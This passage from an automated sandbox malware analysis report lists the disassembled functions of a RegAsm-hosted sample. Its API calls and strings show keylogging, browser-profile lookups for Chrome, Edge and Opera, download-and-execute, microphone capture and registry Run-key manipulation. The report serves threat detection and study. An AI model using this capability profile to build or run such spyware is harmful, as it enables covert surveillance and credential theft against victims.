u, xrefs: 0043C119, 0043C126, 0043C13F, 0043C14C, 0043C172

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: u
API String ID: 269201875-1515575680
Opcode ID: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
Opcode Fuzzy Hash: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 5095b75c5f9db238aea0001e6592924ae8405ba6706ac8883079950a7719889b
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001719

Strings

: , xrefs: 100016B3
Se., xrefs: 100016E5

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _strlen
String ID: : $Se.
API String ID: 4218353326-4089948878
Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765

Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

| , xrefs: 0041B53C
%02i:%02i:%02i:%03i , xrefs: 0041B51E

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

hYG, xrefs: 0041AD46
alarm.wav, xrefs: 0041AD27

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: 927e0edff403eebb4f9eff2a49ef343572b544c1c63ef3d24774cae310748075
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 10002903

Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632

__CxxThrowException@8.LIBVCRUNTIME ref: 10002920

Strings

Unknown exception, xrefs: 1000292D

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

Function 00449A5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
_free.LIBCMT ref: 00449ACC

Strings

u, xrefs: 00449A86, 00449A9C, 00449AB2, 00449AC4, 00449AD2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: u
API String ID: 1836352639-1515575680
Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(00739168,00000020,?), ref: 00401849
waveInAddBuffer.WINMM(00739168,00000020), ref: 0040185F

Strings

u, xrefs: 004017F8

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: u
API String ID: 2315374483-1515575680
Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

JD, xrefs: 00448B29, 00448B16
IsValidLocaleName, xrefs: 00448AF7, 00448B01

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

[AltR], xrefs: 0040B681
[AltL], xrefs: 0040B68D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

!D@, xrefs: 00417089
open, xrefs: 004161A2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlR], xrefs: 0040B6C2
[CtrlL], xrefs: 0040B6D3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF

Function 0043C1C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC

Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E

DeleteCriticalSection.KERNEL32(0075E6C0), ref: 0043C1F1
_free.LIBCMT ref: 0043C205

Strings

u, xrefs: 0043C1D7, 0043C1E4, 0043C20A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$CriticalDeleteSection
String ID: u
API String ID: 1906768660-1515575680
Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D

Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: ,kG$0kG
API String ID: 1881088180-2015055088
Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D

Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413A31
RegDeleteValueW.ADVAPI32 ref: 00413A45

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1

Strings

pth_unenc, xrefs: 0040B869

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8

Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Strings

pth_unenc, xrefs: 00412850

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Function 10007103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 10007103
GetCommandLineW.KERNEL32 ref: 1000710E

Strings

82q, xrefs: 10007109

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: CommandLine
String ID: 82q
API String ID: 3253501508-525039841
